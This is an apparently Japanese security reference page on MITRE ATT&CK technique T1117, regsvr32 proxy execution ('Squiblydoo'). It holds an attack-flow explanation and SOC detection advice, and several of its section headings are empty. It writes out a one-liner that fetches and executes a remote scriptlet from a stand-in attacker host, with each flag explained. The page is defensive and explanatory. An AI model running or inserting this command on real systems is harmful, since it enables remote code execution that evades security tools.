Trusted Design

T1117 - Regsvr32

概要

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)

管理者によるコメント

T1117は「Regsvr32」として定義されていた、Windows環境における極めて強力かつ実戦的な「防御回避(Defense Evasion)」および「実行(Execution)」のテクニックです。

Windows標準のシステムツールである regsvr32.exe を悪用し、「セキュリティソフトの監視をすり抜けながら、インターネット上のサーバー、あるいはローカル内にある悪意あるスクリプトやDLL(拡張ライブラリ)をプロキシ(身代わり)実行させる」手法、通称「Squiblydoo(スクイブリドゥ)」を指します。

1. 概要(攻撃者は何を実現できるのか?)

この手法で攻撃者は、「ファイルレス(Fileless)に近い状態で、ウイルス対策ソフトに一切検知されることなく、C2サーバーからバックドアを直接メモリに読み込んで実行すること」を実現します。

2. 攻撃の仕組みと流れ(Squiblydooの手口)

regsvr32.exe は本来、OLEコントロールやDLL(動的リンクライブラリ)をWindowsシステムに登録(レジストリ登録)するための正規コマンドです。

しかし、このツールには「ネットワーク上の特定ファイルをダウンロードして実行する機能」と「レジストリ登録を行わずに、指定されたCOMコンポーネント(スクリプトレット)の実行だけを行う機能」が備わっています。攻撃者はこの仕様を悪用します。

  1. 初期侵入と足がかりの確立:
    攻撃者はフィッシングメールのマクロや、別の手段でコマンド(cmdやPowerShell)を実行できる足がかりを得ます。

  2. 悪意あるスクリプトレットの準備:
    C2サーバー(例: http://attacker.com/)に、バックドアを実行するための悪意あるXML/スクリプトコード(.sct 拡張子などを持つスクリプトレットファイル payload.sct)を配置しておきます。

  3. Regsvr32の悪用実行(トリガー):
    ターゲットの端末で、以下の特殊な引数を組み合わせたワンライナー(1行のコマンド)を実行します。

    • コマンドの例:
      regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

      • /s:サイレントモード(エラー画面やダイアログを一切出さない)
      • /n:レジストリへの登録処理を行わない(痕跡を減らす)
      • /u:アンインストール(登録解除)処理として呼び出す
      • /i:指定したURL(またはローカルパス)を引数として scrobj.dll に渡す
  4. コードのダウンロードとメモリ展開:
    Windowsは regsvr32.exe を使って、指定されたURLから payload.sct をバックグラウンドでダウンロードします。そして、Windowsの標準コンポーネントである scrobj.dll(Script Component Runtime)がその中身を解釈し、メモリ上で攻撃コードを直接実行します。

  5. バックドアの確立(目的達成):
    セキュリティソフトのログには「正規の regsvr32.exe が正常に動作した」としか記録されませんが、裏ではC2サーバーへの常時接続(バックドア)が確立され、システムが完全掌握されます。

3. 防御・対策

「信頼されたツール」だからといって通信や引数のチェックを怠らない、厳格な監視設計が必要です。

4. 重要ポイント

5. 関連する主なCWE

6. 関連する代表的な事例

標的型攻撃(APT)から世界的なランサムウェアの初期侵入フェーズまで、あらゆるサイバー犯罪アクターの標準武器セットに組み込まれています。

実務上のアドバイス

SOC(セキュリティオペレーションセンター)のログ分析において、regsvr32.exe の親プロセス(起動元)を確認することは非常に重要です。

もし、regsvr32.exe の親プロセスが **cmd.exepowershell.exe、あるいは WordやExcelなどの winword.exeexcel.exe** になっていた場合、それは業務上の正常なレジストリ登録作業ではなく、マクロやハッカーのコマンドからこの T1117(Regsvr32プロキシ実行)が発動した決定的な証拠(レッドフラッグ)となります。

即座に対象端末の通信履歴を調べ、どの外部IP/URLからスクリプトが読み込まれたかを突き止めることが、被害を最小限に抑えるブレイクスルーとなります。

分析

この攻撃手法を利用する脅威アクター

関連する CVE

この攻撃手法に関連する CVE は登録されていません。

攻撃手法 – 脅威アクター Graph


← Technique一覧に戻る ← Tactics一覧に戻る